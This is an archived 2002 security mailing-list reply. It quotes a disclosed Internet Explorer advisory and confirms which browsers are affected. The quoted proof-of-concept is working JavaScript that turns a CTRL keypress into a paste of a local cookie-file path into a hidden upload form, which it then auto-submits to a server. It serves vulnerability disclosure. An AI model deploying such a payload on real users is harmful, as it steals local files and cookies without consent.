Re: Pressing CTRL in IE is dangerous - Sandblad advisory #8

From: Peter Pentchev (roamat_private)
Date: Wed Jul 24 2002 - 01:42:01 PDT

Next message: Steven Champeon: "Re: [Admin/Spamassasin] Re: PHP Security Advisory: Vulnerability in PHP versions 4.2.0 and 4.2.1"

Previous message: Martin J. Muench: "Denial of Service bug in Pine 4.44"
In reply to: Andreas Sandblad: "Pressing CTRL in IE is dangerous - Sandblad advisory #8"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Tue, Jul 23, 2002 at 09:50:30PM +0200, Andreas Sandblad wrote:
> 
>                   - Sandblad advisory #8 -
> 
> ---..---..---..---..---..---..---..---..---..---..---..---..----
> Title:      Pressing CTRL in IE is dangerous
> Date:       [2002-07-23]
> Software:   Internet Explorer
> Impact:     Pressing CTRL in IE may result in arbitrary local
>             file to be uploaded to a remote server (no exact
>             path needed). If special sensitive information is
>             uploaded, it may be used to run remote programs.
[snip]
> 1. When an user presses the CTRL key an onkeydown event can be set to
> fire. In the event function the key pressed is changed to 'V'. The result
> will be a paste operation with less restrictions.
> 
> 2. The content of the clipboard is altered and focus is changed to a
> hidden file upload form. The paste operation will be performed into the
> form, yielding a change of value for the file upload field (not normally
> allowed).
> 
> 3. The upload form is submited automaticly (legal javascript operation).
[snip]
> <!div id=h style="zoom:0.0001">
> <!form name=u enctype="multipart/form-data" method=post action=upload.php>
> <!input type=file name=file></form></div>
> <!script>
> //uploadFile="..\\LOCALS~1\\TEMPOR~1\\CONTENT.IE5\\index.dat";
> uploadFile="..\\Cookies\\index.dat";
> function gotKey(){
>   if (!event.ctrlKey) return;
>   document.onkeydown = null;
>   event.keyCode = 86;
>   window.clipboardData.setData("Text",uploadFile);
>   (p=document.forms.u.file).focus();
>   p.onpropertychange = function(){document.forms.u.submit()};
> } document.onkeydown = gotKey;
> window.onload=function(){document.body.focus()};
> <!/script>

This was verified to work on various versions of IE 5 and 6, and also
on Opera 6.01 build 1041.  However, Mozilla 1.0rc1 is NOT vulnerable,
partly because of a script error (the onkeypress handler should accept
a parameter instead of referring to 'event' directly), and mostly because
of the fact that in Mozilla, event.keyCode is not settable.

G'luck,
Peter

-- 
Peter Pentchev	roamat_private	roamat_private
PGP key:	http://people.FreeBSD.org/~roam/roam.key.asc
Key fingerprint	FDBA FD79 C26F 3C51 C95E  DF9E ED18 B68D 1619 4553
If you think this sentence is confusing, then change one pig.

application/pgp-signature attachment: stored

Next message: Steven Champeon: "Re: [Admin/Spamassasin] Re: PHP Security Advisory: Vulnerability in PHP versions 4.2.0 and 4.2.1"
Previous message: Martin J. Muench: "Denial of Service bug in Pine 4.44"
In reply to: Andreas Sandblad: "Pressing CTRL in IE is dangerous - Sandblad advisory #8"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Jul 24 2002 - 11:54:38 PDT